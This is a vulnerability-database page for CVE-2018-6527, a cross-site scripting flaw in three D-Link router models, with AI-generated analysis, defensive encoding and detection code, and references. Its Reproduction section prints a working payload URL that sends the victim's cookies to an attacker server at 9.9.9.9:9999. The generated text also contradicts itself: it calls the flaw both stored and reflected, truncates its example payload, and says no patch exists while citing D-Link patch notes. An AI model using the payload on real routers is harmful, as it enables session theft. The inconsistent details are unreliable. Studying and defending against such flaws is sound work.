CVE-2018-6527
Description
XSS vulnerability in htdocs/webinc/js/adv_parent_ctrl_map.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted deviceid parameter to soap.cgi.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS vulnerability in D-Link DIR-868L, DIR-865L, and DIR-860L routers allows remote attackers to steal authentication cookies via a crafted deviceid parameter in adv_parent_ctrl_map.php.
Vulnerability
A cross-site scripting (XSS) vulnerability exists in the file htdocs/webinc/js/adv_parent_ctrl_map.php of D-Link DIR-868L (firmware DIR868LA1_FW112b04 and previous), DIR-865L (firmware patch 1.08.B01 and previous), and DIR-860L (firmware DIR860LA1_FW110b04 and previous) routers [1]. The deviceid GET parameter is reflected in the page without proper sanitization, allowing injection of arbitrary HTML and JavaScript [1]. The vulnerability is reachable from both WAN and LAN interfaces [1].
Exploitation
An attacker can craft a malicious URL containing a deviceid parameter with embedded JavaScript, such as " to execute arbitrary code in the victim's browser [1]. The attacker must lure an authenticated user (e.g., via phishing or a crafted link) to visit the vulnerable page [1]. The XSS payload executes in the context of the router's web interface, allowing the attacker to access the victim's session cookies [1].
Impact
Successful exploitation allows an attacker to steal authentication cookies from an authenticated user's session [1]. With these cookies, the attacker can impersonate the user and gain administrative access to the router's web interface, potentially leading to full device compromise, including configuration changes, information disclosure, or further network attacks [1].
Mitigation
D-Link has not released a public patch for these models (DIR-868L, DIR-865L, DIR-860L) as of the publication date [1]. Users should restrict access to the router's web interface from the WAN side and use strong, unique passwords. The affected devices may be nearing or at end-of-life; upgrading to a supported model is recommended [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 3
Patches: 0. No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization of the `deviceid` GET parameter in `adv_parent_ctrl_map.php` allows reflected XSS."
Attack vector
An unauthenticated attacker on the LAN or WAN can craft a URL containing a malicious `deviceid` parameter and lure an authenticated victim to open it. The unsanitized parameter is injected into a JavaScript context inside `adv_parent_ctrl_map.php`, allowing the attacker to break out of the string and execute arbitrary JavaScript. This XSS can be used to steal the victim's authentication cookies, giving the attacker control over the router's web interface [ref_id=1].
Affected code
The vulnerability resides in `/htdocs/webinc/js/adv_parent_ctrl_map.php`. The PHP file directly echoes the `deviceid` GET parameter into a JavaScript string without any sanitization or encoding [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] does not provide a specific fix, but the root cause is the lack of input validation and output encoding. The remediation would require properly escaping or sanitizing the `deviceid` parameter before embedding it in the JavaScript response, such as using `htmlspecialchars()` or a similar encoding function to neutralize any HTML/JavaScript metacharacters.
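The output-encoding point above, as an added example (not D-Link's code and not taken from the advisory): it compares raw concatenation, HTML-entity escaping that leaves single quotes alone, and JavaScript-string escaping for a value placed in a single-quoted JavaScript string. The firmware template is not shown on this page, so the `setDevice('...')` sink, the `probe()` marker and all function names are assumptions.

```javascript
// Added example: encoders for a value echoed into a single-quoted JS string.
// ASSUMPTION: the firmware template is not shown on the page; render() models
// the described sink as setDevice('<deviceid>'). All names are hypothetical.
const render = (deviceid, encode) => "setDevice('" + encode(deviceid) + "');";

// Vulnerable pattern described on the page: the raw value is concatenated.
const encodeNone = (v) => v;

// HTML-entity escaping that leaves ' untouched (the default behaviour of PHP's
// htmlspecialchars() before PHP 8.1). Wrong encoder for a JS string context.
const encodeHtmlNoQuotes = (v) =>
  v.replace(/&/g, '&amp;').replace(/</g, '&lt;')
    .replace(/>/g, '&gt;').replace(/"/g, '&quot;');

// JS-string escaping: every UTF-16 unit outside a small allowlist becomes a
// \uXXXX escape, so quotes, backslashes, newlines and "</script>" stay data.
const encodeJsString = (v) =>
  v.replace(/[^A-Za-z0-9_.-]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));

// Run a rendered script against stubs and report what it actually did.
function evaluate(script) {
  const seen = { deviceIds: [], injectedCalls: 0, error: null };
  const setDevice = (id) => seen.deviceIds.push(id);
  const probe = () => { seen.injectedCalls += 1; }; // harmless marker
  try {
    new Function('setDevice', 'probe', script)(setDevice, probe);
  } catch (e) {
    seen.error = e.name; // e.g. SyntaxError when the literal is left broken
  }
  return seen;
}

// Constructed test inputs: a string-breakout probe and a trailing backslash.
const BREAKOUT = "abc');probe();//";
const TRAILING_BACKSLASH = 'abc\\';

for (const [name, enc] of Object.entries(
  { encodeNone, encodeHtmlNoQuotes, encodeJsString })) {
  console.log(name, evaluate(render(BREAKOUT, enc)),
    evaluate(render(TRAILING_BACKSLASH, enc)));
}
```

Only the JavaScript-string encoder keeps both inputs inside the literal; the HTML-entity encoder lets the probe run and leaves a broken script for the trailing backslash.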
Preconditions
- auth: The victim must be authenticated to the router's web interface.
- network: The attacker must be able to reach the router's web interface over the network (LAN or WAN).
- input: The attacker must craft a URL with a malicious deviceid parameter and trick the victim into opening it.
Reproduction
As an authenticated user, visit the following URL in a browser that has access to the router: `http://192.168.0.1/adv_parent_ctrl_map.php?deviceid=whatever\');window.open(\'http://9.9.9.9:9999/cookie.asp?msg=\'+document.cookie`. The JavaScript code will execute and send the victim's cookies to the attacker-controlled server at 9.9.9.9:9999 [ref_id=1].
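Because the attack depends on a victim opening a crafted link, one place to catch it is wherever URLs are inspected (mail link scanning, proxy logs). The following is an added example, not part of the advisory: it flags URLs that target `adv_parent_ctrl_map.php` with a `deviceid` value outside an allowlist. The allowlist pattern is an assumption, since the page does not document the legitimate `deviceid` format, and the function names and sample URLs are constructed.

```javascript
// Added example: flag URLs aimed at the page named in this CVE whose deviceid
// value could leave a JavaScript string.
// ASSUMPTION: legitimate deviceid values use only [A-Za-z0-9:_.-]; the real
// format is not documented on the page, so adjust SAFE_DEVICEID as needed.
const TARGET_PAGE = 'adv_parent_ctrl_map.php';
const SAFE_DEVICEID = /^[A-Za-z0-9:_.-]{0,64}$/;

// Undo repeated percent-encoding so the reported value is the decoded one.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { return current; }
    if (next === current) break;
    current = next;
  }
  return current;
}

function inspectUrl(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch {
    return { match: false, reason: 'unparseable', values: [] };
  }
  if (!url.pathname.toLowerCase().endsWith('/' + TARGET_PAGE)) {
    return { match: false, reason: 'other page', values: [] };
  }
  // searchParams already decodes once; fullyDecode handles nested encoding.
  const bad = url.searchParams.getAll('deviceid')
    .map((v) => fullyDecode(v))
    .filter((v) => !SAFE_DEVICEID.test(v));
  return bad.length
    ? { match: true, reason: 'deviceid outside allowlist', values: bad }
    : { match: false, reason: 'no suspicious deviceid', values: [] };
}

// Constructed sample URLs (not taken from real traffic).
const SAMPLES = [
  'http://192.168.0.1/adv_parent_ctrl_map.php?deviceid=00:11:22:33:44:55',
  'http://192.168.0.1/adv_parent_ctrl_map.php?deviceid=abc%2527%2529',
  'http://192.168.0.1/index.php?deviceid=%27',
];
for (const s of SAMPLES) console.log(s, inspectUrl(s));
```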
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 3
- ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf (mitre, x_refsource_CONFIRM)
- ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf (mitre, x_refsource_CONFIRM)
- ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf (mitre, x_refsource_CONFIRM)